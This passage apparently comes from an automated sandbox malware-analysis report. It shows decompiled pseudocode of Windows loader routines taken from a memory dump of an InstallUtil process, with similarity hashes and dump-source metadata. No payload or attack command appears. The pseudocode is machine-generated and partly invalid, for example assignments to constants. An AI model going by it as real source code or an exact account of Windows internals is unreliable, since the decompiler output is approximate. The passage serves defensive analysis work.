                      														_t342 =  *0x7ffe0330;
                      														_t361 =  *0x13bb218; // 0x0
                      														asm("ror edi, cl");
                      														 *0x13bb1e0( &_v192, _t353, _v168, 0, _v180);
                      														 *(_t361 ^  *0x7ffe0330)();
                      														_t269 = _v192;
                      														_t353 = _v176;
                      														__eflags = _t269;
                      														if(__eflags != 0) {
                      															_v168 = _t269;
                      														}
                      													}
                      												}
                      											}
                      											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                      												_t366 = 0xc000007a;
                      											}
                      											_t247 =  *(_t353 + 0x50);
                      											if(_t247[3] == 0xffffffff) {
                      												L40:
                      												if(_t366 == 0xc000007a) {
                      													__eflags = _t288;
                      													if(_t288 == 0) {
                      														goto L136;
                      													} else {
                      														_t366 = 0xc0000139;
                      													}
                      													goto L54;
                      												}
                      											} else {
                      												_t249 =  *_t247;
                      												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                      													goto L40;
                      												} else {
                      													_t250 = _t249 | 0xffffffff;
                      													asm("lock xadd [edi+0x9c], eax");
                      													if((_t249 | 0xffffffff) == 0) {
                      														E012E2280(_t250, 0x13b84d8);
                      														_t342 =  *(_t353 + 0x54);
                      														_t165 = _t353 + 0x54; // 0x54
                      														_t252 = _t165;
                      														__eflags =  *(_t342 + 4) - _t252;
                      														if( *(_t342 + 4) != _t252) {
                      															L135:
                      															asm("int 0x29");
                      															L136:
                      															_t288 = _v200;
                      															_t366 = 0xc0000138;
                      															L54:
                      															_t342 = _t288;
                      															L01303898(0, _t288, _t366);
                      														} else {
                      															_t324 =  *(_t252 + 4);
                      															__eflags =  *_t324 - _t252;
                      															if( *_t324 != _t252) {
                      																goto L135;
                      															} else {
                      																 *_t324 = _t342;
                      																 *(_t342 + 4) = _t324;
                      																_t293 =  *(_t353 + 0x50);
                      																_v180 =  *_t293;
                      																E012DFFB0(_t293, _t353, 0x13b84d8);
                      																__eflags =  *((short*)(_t353 + 0x3a));
                      																if( *((short*)(_t353 + 0x3a)) != 0) {
                      																	_t342 = 0;
                      																	__eflags = 0;
                      																	E013037F5(_t353, 0);
                      																}
                      																E01300413(_t353);
                      																_t256 =  *(_t353 + 0x48);
                      																__eflags = _t256;
                      																if(_t256 != 0) {
                      																	__eflags = _t256 - 0xffffffff;
                      																	if(_t256 != 0xffffffff) {
                      																		E012F9B10(_t256);
                      																	}
                      																}
                      																__eflags =  *(_t353 + 0x28);
                      																if( *(_t353 + 0x28) != 0) {
                      																	_t174 = _t353 + 0x24; // 0x24
                      																	E012F02D6(_t174);
                      																}
                      																L012E77F0( *0x13b7b98, 0, _t353);
                      																__eflags = _v180 - _t293;
                      																if(__eflags == 0) {
                      																	E012FC277(_t293, _t366);
                      																}
                      																_t288 = _v164;
                      																goto L40;
                      															}
                      														}
                      													} else {
                      														goto L40;
                      													}
                      												}
                      											}
                      										}
                      									} else {
                      										L012DEC7F(_t353);
                      										L012F19B8(_t287, 0, _t353, 0);
                      										_t200 = E012CF4E3(__eflags);
                      										continue;
                      									}
                      								}
                      								L41:
                      								if(_v157 != 0) {
                      									L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                      								}
                      								if(_t366 < 0) {
                      									L46:
                      									 *_v212 = _v168;
                      									_t204 = _t366;
                      									L47:
                      									_pop(_t354);
                      									_pop(_t367);
                      									_pop(_t289);
                      									return E0130B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                      								} else {
                      									_t206 =  *0x13bb2f8; // 0x0
                      									if((_t206 |  *0x13bb2fc) == 0 || ( *0x13bb2e4 & 0x00000001) != 0) {
                      										goto L46;
                      									} else {
                      										_t297 =  *0x13bb2ec; // 0x0
                      										_v200 = 0;
                      										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
                      											_t355 = _v168;
                      											_t342 =  &_v208;
                      											_t208 = E01376B68(_v168,  &_v208, _v168, __eflags);
                      											__eflags = _t208 - 1;
                      											if(_t208 == 1) {
                      												goto L46;
                      											} else {
                      												__eflags = _v208 & 0x00000010;
                      												if((_v208 & 0x00000010) == 0) {
                      													goto L46;
                      												} else {
                      													_t342 = 4;
                      													_t366 = E01376AEB(_t355, 4,  &_v216);
                      													__eflags = _t366;
                      													if(_t366 >= 0) {
                      														goto L46;
                      													} else {
                      														asm("int 0x29");
                      														_t356 = 0;
                      														_v44 = 0;
                      														_t290 = _v52;
                      														__eflags = 0;
                      														if(0 == 0) {
                      															L108:
                      															_t356 = 0;
                      															_v44 = 0;
                      															goto L63;
                      														} else {
                      															__eflags = 0;
                      															if(0 < 0) {
                      																goto L108;
                      															}
                      															L63:
                      															_v112 = _t356;
                      															__eflags = _t356;
                      															if(_t356 == 0) {
                      																L143:
                      																_v8 = 0xfffffffe;
                      																_t211 = 0xc0000089;
                      															} else {
                      																_v36 = 0;
                      																_v60 = 0;
                      																_v48 = 0;
                      																_v68 = 0;
                      																_v44 = _t290 & 0xfffffffc;
                      																E012DE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                      																_t306 = _v68;
                      																__eflags = _t306;
                      																if(_t306 == 0) {
                      																	_t216 = 0xc000007b;
                      																	_v36 = 0xc000007b;
                      																	_t307 = _v60;
                      																} else {
                      																	__eflags = _t290 & 0x00000001;
                      																	if(__eflags == 0) {
                      																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                      																		__eflags = _t349 - 0x10b;
                      																		if(_t349 != 0x10b) {
                      																			__eflags = _t349 - 0x20b;
                      																			if(_t349 == 0x20b) {
                      																				goto L102;
                      																			} else {
                      																				_t307 = 0;
                      																				_v48 = 0;
                      																				_t216 = 0xc000007b;
                      																				_v36 = 0xc000007b;
                      																				goto L71;
                      																			}
                      																		} else {
                      																			L102:
                      																			_t307 =  *(_t306 + 0x50);
                      																			goto L69;
                      																		}
                      																		goto L151;
                      																	} else {
                      																		_t239 = L012DEAEA(_t290, _t290, _t356, _t366, __eflags);
                      																		_t307 = _t239;
                      																		_v60 = _t307;
                      																		_v48 = _t307;
                      																		__eflags = _t307;
                      																		if(_t307 != 0) {
                      																			L70:
                      																			_t216 = _v36;
                      																		} else {
                      																			_push(_t239);
                      																			_push(0x14);
                      																			_push( &_v144);
                      																			_push(3);
                      																			_push(_v44);
                      																			_push(0xffffffff);
                      																			_t319 = E01309730();
                      																			_v36 = _t319;
                      																			__eflags = _t319;
                      																			if(_t319 < 0) {
                      																				_t216 = 0xc000001f;
                      																				_v36 = 0xc000001f;
                      																				_t307 = _v60;
                      																			} else {
                      																				_t307 = _v132;
                      																				L69:
                      																				_v48 = _t307;
                      																				goto L70;
                      																			}
                      																		}
                      																	}
                      																}
                      																L71:
                      																_v72 = _t307;
                      																_v84 = _t216;
                      																__eflags = _t216 - 0xc000007b;
                      																if(_t216 == 0xc000007b) {
                      																	L150:
                      																	_v8 = 0xfffffffe;
                      																	_t211 = 0xc000007b;
                      																} else {
                      																	_t344 = _t290 & 0xfffffffc;
                      																	_v76 = _t344;
                      																	__eflags = _v40 - _t344;
                      																	if(_v40 <= _t344) {
                      																		goto L150;
                      																	} else {
                      																		__eflags = _t307;
                      																		if(_t307 == 0) {
                      																			L75:
                      																			_t217 = 0;
                      																			_v104 = 0;
                      																			__eflags = _t366;
                      																			if(_t366 != 0) {
                      																				__eflags = _t290 & 0x00000001;
                      																				if((_t290 & 0x00000001) != 0) {
                      																					_t217 = 1;
                      																					_v104 = 1;
                      																				}
                      																				_t290 = _v44;
                      																				_v52 = _t290;
                      																			}
                      																			__eflags = _t217 - 1;
                      																			if(_t217 != 1) {
                      																				_t369 = 0;
                      																				_t218 = _v40;
                      																				goto L91;
                      																			} else {
                      																				_v64 = 0;
                      																				E012DE9C0(1, _t290, 0, 0,  &_v64);
                      																				_t309 = _v64;
                      																				_v108 = _t309;
                      																				__eflags = _t309;
                      																				if(_t309 == 0) {
                      																					goto L143;
                      																				} else {
                      																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                      																					__eflags = _t226 - 0x10b;
                      																					if(_t226 != 0x10b) {
                      																						__eflags = _t226 - 0x20b;
                      																						if(_t226 != 0x20b) {
                      																							goto L143;
                      																						} else {
                      																							_t371 =  *(_t309 + 0x98);
                      																							goto L83;
                      																						}
                      																					} else {
                      																						_t371 =  *(_t309 + 0x88);
                      																						L83:
                      																						__eflags = _t371;
                      																						if(_t371 != 0) {
                      																							_v80 = _t371 - _t356 + _t290;
                      																							_t310 = _v64;
                      																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                      																							_t292 =  *(_t310 + 6) & 0x0000ffff;
                      																							_t311 = 0;
                      																							__eflags = 0;
                      																							while(1) {
                      																								_v120 = _t311;
                      																								_v116 = _t348;
                      																								__eflags = _t311 - _t292;
                      																								if(_t311 >= _t292) {
                      																									goto L143;
                      																								}
                      																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
                      																								__eflags = _t371 - _t359;
                      																								if(_t371 < _t359) {
                      																									L98:
                      																									_t348 = _t348 + 0x28;
                      																									_t311 = _t311 + 1;
                      																									continue;
                      																								} else {
                      																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                      																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                      																										goto L98;
                      																									} else {
                      																										__eflags = _t348;
                      																										if(_t348 == 0) {
                      																											goto L143;
                      																										} else {
                      																											_t218 = _v40;
                      																											_t312 =  *_t218;
                      																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                      																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                      																												_v100 = _t359;
                      																												_t360 = _v108;
                      																												_t372 = L012D8F44(_v108, _t312);
                      																												__eflags = _t372;
                      																												if(_t372 == 0) {
                      																													goto L143;
                      																												} else {
                      																													_t290 = _v52;
                      																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01303C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                      																													_t307 = _v72;
                      																													_t344 = _v76;
                      																													_t218 = _v40;
                      																													goto L91;
                      																												}
                      																											} else {
                      																												_t290 = _v52;
                      																												_t307 = _v72;
                      																												_t344 = _v76;
                      																												_t369 = _v80;
                      																												L91:
                      																												_t358 = _a4;
                      																												__eflags = _t358;
                      																												if(_t358 == 0) {
                      																													L95:
                      																													_t308 = _a8;
                      																													__eflags = _t308;
                      																													if(_t308 != 0) {
                      																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
                      																													}
                      																													_v8 = 0xfffffffe;
                      																													_t211 = _v84;
                      																												} else {
                      																													_t370 =  *_t218 - _t369 + _t290;
                      																													 *_t358 = _t370;
                      																													__eflags = _t370 - _t344;
                      																													if(_t370 <= _t344) {
                      																														L149:
                      																														 *_t358 = 0;
                      																														goto L150;
                      																													} else {
                      																														__eflags = _t307;
                      																														if(_t307 == 0) {
                      																															goto L95;
                      																														} else {
                      																															__eflags = _t370 - _t344 + _t307;
                      																															if(_t370 >= _t344 + _t307) {
                      																																goto L149;
                      																															} else {
                      																																goto L95;
                      																															}
                      																														}
                      																													}
                      																												}
                      																											}
                      																										}
                      																									}
                      																								}
                      																								goto L97;
                      																							}
                      																						}
                      																						goto L143;
                      																					}
                      																				}
                      																			}
                      																		} else {
                      																			__eflags = _v40 - _t307 + _t344;
                      																			if(_v40 >= _t307 + _t344) {
                      																				goto L150;
                      																			} else {
                      																				goto L75;
                      																			}
                      																		}
                      																	}
                      																}
                      															}
                      															L97:
                      															 *[fs:0x0] = _v20;
                      															return _t211;
                      														}
                      													}
                      												}
                      											}
                      										} else {
                      											goto L46;
                      										}
                      									}
                      								}
                      								goto L151;
                      							}
                      							_t288 = _v164;
                      							_t366 = 0xc0000135;
                      							goto L41;
                      						}
                      					}
                      				}
                      				L151:
                      			}


                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: DebugPrintTimes
                      • String ID:
                      • API String ID: 3446177414-0
                      • Opcode ID: eedf39e14f9d0da65e42ef9dbf9019c04772756fd76e83d784cc47696db2837e
                      • Instruction ID: f4226dc1b84e33ad02aa50660401f61e244c425246e101b5ab765e29fe25f667
                      • Opcode Fuzzy Hash: eedf39e14f9d0da65e42ef9dbf9019c04772756fd76e83d784cc47696db2837e
                      • Instruction Fuzzy Hash: F6E1D230A1075ACFEB35DF68C880BA9B7B5BF45308F0501E9DA09AB2C5D774A981CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 67%
                      			E012F513A(intOrPtr __ecx, void* __edx) {
                      				signed int _v8;
                      				signed char _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				char _v28;
                      				signed int _v32;
                      				signed int _v36;
                      				signed int _v40;
                      				intOrPtr _v44;
                      				intOrPtr _v48;
                      				char _v63;
                      				char _v64;
                      				signed int _v72;
                      				signed int _v76;
                      				signed int _v80;
                      				signed int _v84;
                      				signed int _v88;
                      				signed char* _v92;
                      				signed int _v100;
                      				signed int _v104;
                      				char _v105;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* _t157;
                      				signed int _t159;
                      				signed int _t160;
                      				unsigned int* _t161;
                      				intOrPtr _t165;
                      				signed int _t172;
                      				signed char* _t181;
                      				intOrPtr _t189;
                      				intOrPtr* _t200;
                      				signed int _t202;
                      				signed int _t203;
                      				char _t204;
                      				signed int _t207;
                      				signed int _t208;
                      				void* _t209;
                      				intOrPtr _t210;
                      				signed int _t212;
                      				signed int _t214;
                      				signed int _t221;
                      				signed int _t222;
                      				signed int _t226;
                      				intOrPtr* _t232;
                      				signed int _t233;
                      				signed int _t234;
                      				intOrPtr _t237;
                      				intOrPtr _t238;
                      				intOrPtr _t240;
                      				void* _t245;
                      				signed int _t246;
                      				signed int _t247;
                      				void* _t248;
                      				void* _t251;
                      				void* _t252;
                      				signed int _t253;
                      				signed int _t255;
                      				signed int _t256;
                      
                      				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                      				_v8 =  *0x13bd360 ^ _t255;
                      				_v32 = _v32 & 0x00000000;
                      				_t251 = __edx;
                      				_t237 = __ecx;
                      				_t212 = 6;
                      				_t245 =  &_v84;
                      				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                      				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                      				_v48 = __ecx;
                      				_v36 = _t207;
                      				_t157 = memset(_t245, 0, _t212 << 2);
                      				_t256 = _t255 + 0xc;
                      				_t246 = _t245 + _t212;
                      				if(_t207 == 2) {
                      					_t247 =  *(_t237 + 0x60);
                      					_t208 =  *(_t237 + 0x64);
                      					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                      					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                      					_v104 = _t159;
                      					_v76 = _t159;
                      					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                      					_v100 = _t160;
                      					_v72 = _t160;
                      					L19:
                      					_v80 = _t208;
                      					_v84 = _t247;
                      					L8:
                      					_t214 = 0;
                      					if( *(_t237 + 0x74) > 0) {
                      						_t82 = _t237 + 0x84; // 0x124
                      						_t161 = _t82;
                      						_v92 = _t161;
                      						while( *_t161 >> 0x1f != 0) {
                      							_t200 = _v92;
                      							if( *_t200 == 0x80000000) {
                      								break;
                      							}
                      							_t214 = _t214 + 1;
                      							_t161 = _t200 + 0x10;
                      							_v92 = _t161;
                      							if(_t214 <  *(_t237 + 0x74)) {
                      								continue;
                      							}
                      							goto L9;
                      						}
                      						_v88 = _t214 << 4;
                      						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                      						_t165 = 0;
                      						asm("adc eax, [ecx+edx+0x7c]");
                      						_v24 = _t165;
                      						_v28 = _v40;
                      						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                      						_t221 = _v40;
                      						_v16 =  *_v92;
                      						_v32 =  &_v28;
                      						if( *(_t237 + 0x4e) >> 0xf == 0) {
                      							goto L9;
                      						}
                      						_t240 = _v48;
                      						if( *_v92 != 0x80000000) {
                      							goto L9;
                      						}
                      						 *((intOrPtr*)(_t221 + 8)) = 0;
                      						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                      						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                      						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                      						_t226 = 0;
                      						_t181 = _t251 + 0x66;
                      						_v88 = 0;
                      						_v92 = _t181;
                      						do {
                      							if( *((char*)(_t181 - 2)) == 0) {
                      								goto L31;
                      							}
                      							_t226 = _v88;
                      							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                      								_t181 = E0130D0F0(1, _t226 + 0x20, 0);
                      								_t226 = _v40;
                      								 *(_t226 + 8) = _t181;
                      								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                      								L34:
                      								if(_v44 == 0) {
                      									goto L9;
                      								}
                      								_t210 = _v44;
                      								_t127 = _t210 + 0x1c; // 0x1c
                      								_t249 = _t127;
                      								E012E2280(_t181, _t127);
                      								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                      								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                      								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                      									L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                      								}
                      								_t189 = L012E4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                      								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                      								if(_t189 != 0) {
                      									 *((intOrPtr*)(_t189 + 8)) = _v20;
                      									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                      									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                      									 *_t232 = _t232 + 0x10;
                      									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                      									E0130F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                      									_t256 = _t256 + 0xc;
                      								}
                      								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                      								E012DFFB0(_t210, _t249, _t249);
                      								_t222 = _v76;
                      								_t172 = _v80;
                      								_t208 = _v84;
                      								_t247 = _v88;
                      								L10:
                      								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                      								_v44 = _t238;
                      								if(_t238 != 0) {
                      									 *0x13bb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                      									_v44();
                      								}
                      								_pop(_t248);
                      								_pop(_t252);
                      								_pop(_t209);
                      								return E0130B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                      							}
                      							_t181 = _v92;
                      							L31:
                      							_t226 = _t226 + 1;
                      							_t181 =  &(_t181[0x18]);
                      							_v88 = _t226;
                      							_v92 = _t181;
                      						} while (_t226 < 4);
                      						goto L34;
                      					}
                      					L9:
                      					_t172 = _v104;
                      					_t222 = _v100;
                      					goto L10;
                      				}
                      				_t247 = _t246 | 0xffffffff;
                      				_t208 = _t247;
                      				_v84 = _t247;
                      				_v80 = _t208;
                      				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                      					_t233 = _v72;
                      					_v105 = _v64;
                      					_t202 = _v76;
                      				} else {
                      					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                      					_v105 = 1;
                      					if(_v63 <= _t204) {
                      						_v63 = _t204;
                      					}
                      					_t202 = _v76 |  *(_t251 + 0x40);
                      					_t233 = _v72 |  *(_t251 + 0x44);
                      					_t247 =  *(_t251 + 0x38);
                      					_t208 =  *(_t251 + 0x3c);
                      					_v76 = _t202;
                      					_v72 = _t233;
                      					_v84 = _t247;
                      					_v80 = _t208;
                      				}
                      				_v104 = _t202;
                      				_v100 = _t233;
                      				if( *((char*)(_t251 + 0xc4)) != 0) {
                      					_t237 = _v48;
                      					_v105 = 1;
                      					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                      						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                      						_t237 = _v48;
                      					}
                      					_t203 = _t202 |  *(_t251 + 0xb8);
                      					_t234 = _t233 |  *(_t251 + 0xbc);
                      					_t247 = _t247 &  *(_t251 + 0xb0);
                      					_t208 = _t208 &  *(_t251 + 0xb4);
                      					_v104 = _t203;
                      					_v76 = _t203;
                      					_v100 = _t234;
                      					_v72 = _t234;
                      					_v84 = _t247;
                      					_v80 = _t208;
                      				}
                      				if(_v105 == 0) {
                      					_v36 = _v36 & 0x00000000;
                      					_t208 = 0;
                      					_t247 = 0;
                      					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                      					goto L19;
                      				} else {
                      					_v36 = 1;
                      					goto L8;
                      				}
                      			}

                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: DebugPrintTimes
                      • String ID:
                      • API String ID: 3446177414-0
                      • Opcode ID: 5e5bfe7f0647793d8f3f2a51c5b3b8b87824e232c850fc8f1de1021f22cd1bef
                      • Instruction ID: 35c5ab7befe460a589d6d56151216a25a6885c380a77eb1d85b36f33586a2d69
                      • Opcode Fuzzy Hash: 5e5bfe7f0647793d8f3f2a51c5b3b8b87824e232c850fc8f1de1021f22cd1bef
                      • Instruction Fuzzy Hash: 59C153B55083819FD354CF28C581A6AFBF1BF88308F184A6EF9998B352D370E945CB56
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 74%
                      			E012F03E2(signed int __ecx, signed int __edx) {
                      				signed int _v8;
                      				signed int _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				signed int _v32;
                      				signed int _v36;
                      				intOrPtr _v40;
                      				signed int _v44;
                      				signed int _v48;
                      				char _v52;
                      				char _v56;
                      				char _v64;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t56;
                      				signed int _t58;
                      				char* _t64;
                      				intOrPtr _t65;
                      				signed int _t74;
                      				signed int _t79;
                      				char* _t83;
                      				intOrPtr _t84;
                      				signed int _t93;
                      				signed int _t94;
                      				signed char* _t95;
                      				signed int _t99;
                      				signed int _t100;
                      				signed char* _t101;
                      				signed int _t105;
                      				signed int _t119;
                      				signed int _t120;
                      				void* _t122;
                      				signed int _t123;
                      				signed int _t127;
                      
                      				_v8 =  *0x13bd360 ^ _t127;
                      				_t119 = __ecx;
                      				_t105 = __edx;
                      				_t118 = 0;
                      				_v20 = __edx;
                      				_t120 =  *(__ecx + 0x20);
                      				if(E012F0548(__ecx, 0) != 0) {
                      					_t56 = 0xc000022d;
                      					L23:
                      					return E0130B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                      				} else {
                      					_v12 = _v12 | 0xffffffff;
                      					_t58 = _t120 + 0x24;
                      					_t109 =  *(_t120 + 0x18);
                      					_t118 = _t58;
                      					_v16 = _t58;
                      					E012DB02A( *(_t120 + 0x18), _t118, 0x14a5);
                      					_v52 = 0x18;
                      					_v48 = 0;
                      					0x840 = 0x40;
                      					if( *0x13b7c1c != 0) {
                      					}
                      					_v40 = 0x840;
                      					_v44 = _t105;
                      					_v36 = 0;
                      					_v32 = 0;
                      					if(E012E7D50() != 0) {
                      						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                      					} else {
                      						_t64 = 0x7ffe0384;
                      					}
                      					if( *_t64 != 0) {
                      						_t65 =  *[fs:0x30];
                      						__eflags =  *(_t65 + 0x240) & 0x00000004;
                      						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                      							_t100 = E012E7D50();
                      							__eflags = _t100;
                      							if(_t100 == 0) {
                      								_t101 = 0x7ffe0385;
                      							} else {
                      								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                      							}
                      							__eflags =  *_t101 & 0x00000020;
                      							if(( *_t101 & 0x00000020) != 0) {
                      								_t118 = _t118 | 0xffffffff;
                      								_t109 = 0x1485;
                      								E01347016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                      							}
                      						}
                      					}
                      					_t105 = 0;
                      					while(1) {
                      						_push(0x60);
                      						_push(5);
                      						_push( &_v64);
                      						_push( &_v52);
                      						_push(0x100021);
                      						_push( &_v12);
                      						_t122 = E01309830();
                      						if(_t122 >= 0) {
                      							break;
                      						}
                      						__eflags = _t122 - 0xc0000034;
                      						if(_t122 == 0xc0000034) {
                      							L38:
                      							_t120 = 0xc0000135;
                      							break;
                      						}
                      						__eflags = _t122 - 0xc000003a;
                      						if(_t122 == 0xc000003a) {
                      							goto L38;
                      						}
                      						__eflags = _t122 - 0xc0000022;
                      						if(_t122 != 0xc0000022) {
                      							break;
                      						}
                      						__eflags = _t105;
                      						if(__eflags != 0) {
                      							break;
                      						}
                      						_t109 = _t119;
                      						_t99 = E013469A6(_t119, __eflags);
                      						__eflags = _t99;
                      						if(_t99 == 0) {
                      							break;
                      						}
                      						_t105 = _t105 + 1;
                      					}
                      					if( !_t120 >= 0) {
                      						L22:
                      						_t56 = _t120;
                      						goto L23;
                      					}
                      					if( *0x13b7c04 != 0) {
                      						_t118 = _v12;
                      						_t120 = E0134A7AC(_t119, _t118, _t109);
                      						__eflags = _t120;
                      						if(_t120 >= 0) {
                      							goto L10;
                      						}
                      						__eflags =  *0x13b7bd8;
                      						if( *0x13b7bd8 != 0) {
                      							L20:
                      							if(_v12 != 0xffffffff) {
                      								_push(_v12);
                      								E013095D0();
                      							}
                      							goto L22;
                      						}
                      					}
                      					L10:
                      					_push(_v12);
                      					_t105 = _t119 + 0xc;
                      					_push(0x1000000);
                      					_push(0x10);
                      					_push(0);
                      					_push(0);
                      					_push(0xf);
                      					_push(_t105);
                      					_t120 = E013099A0();
                      					if(_t120 < 0) {
                      						__eflags = _t120 - 0xc000047e;
                      						if(_t120 == 0xc000047e) {
                      							L51:
                      							_t74 = E01343540(_t120);
                      							_t119 = _v16;
                      							_t120 = _t74;
                      							L52:
                      							_t118 = 0x1485;
                      							E012CB1E1(_t120, 0x1485, 0, _t119);
                      							goto L20;
                      						}
                      						__eflags = _t120 - 0xc000047f;
                      						if(_t120 == 0xc000047f) {
                      							goto L51;
                      						}
                      						__eflags = _t120 - 0xc0000462;
                      						if(_t120 == 0xc0000462) {
                      							goto L51;
                      						}
                      						_t119 = _v16;
                      						__eflags = _t120 - 0xc0000017;
                      						if(_t120 != 0xc0000017) {
                      							__eflags = _t120 - 0xc000009a;
                      							if(_t120 != 0xc000009a) {
                      								__eflags = _t120 - 0xc000012d;
                      								if(_t120 != 0xc000012d) {
                      									_v28 = _t119;
                      									_push( &_v56);
                      									_push(1);
                      									_v24 = _t120;
                      									_push( &_v28);
                      									_push(1);
                      									_push(2);
                      									_push(0xc000007b);
                      									_t79 = E0130AAF0();
                      									__eflags = _t79;
                      									if(_t79 >= 0) {
                      										__eflags =  *0x13b8474 - 3;
                      										if( *0x13b8474 != 3) {
                      											 *0x13b79dc =  *0x13b79dc + 1;
                      										}
                      									}
                      								}
                      							}
                      						}
                      						goto L52;
                      					}
                      					if(E012E7D50() != 0) {
                      						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                      					} else {
                      						_t83 = 0x7ffe0384;
                      					}
                      					if( *_t83 != 0) {
                      						_t84 =  *[fs:0x30];
                      						__eflags =  *(_t84 + 0x240) & 0x00000004;
                      						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                      							_t94 = E012E7D50();
                      							__eflags = _t94;
                      							if(_t94 == 0) {
                      								_t95 = 0x7ffe0385;
                      							} else {
                      								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                      							}
                      							__eflags =  *_t95 & 0x00000020;
                      							if(( *_t95 & 0x00000020) != 0) {
                      								E01347016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                      							}
                      						}
                      					}
                      					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                      						if( *0x13b8708 != 0) {
                      							_t118 =  *0x7ffe0330;
                      							_t123 =  *0x13b7b00; // 0x0
                      							asm("ror esi, cl");
                      							 *0x13bb1e0(_v12, _v20, 0x20);
                      							_t93 =  *(_t123 ^  *0x7ffe0330)();
                      							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                      							asm("sbb esi, esi");
                      							_t120 =  ~_t50 & _t93;
                      						} else {
                      							_t120 = 0;
                      						}
                      					}
                      					if( !_t120 >= 0) {
                      						L19:
                      						_push( *_t105);
                      						E013095D0();
                      						 *_t105 =  *_t105 & 0x00000000;
                      						goto L20;
                      					}
                      					_t120 = E012D7F65(_t119);
                      					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                      						__eflags = _t120;
                      						if(_t120 < 0) {
                      							goto L19;
                      						}
                      						 *(_t119 + 0x64) = _v12;
                      						goto L22;
                      					}
                      					goto L19;
                      				}
                      			}

                      Memory Dump Source
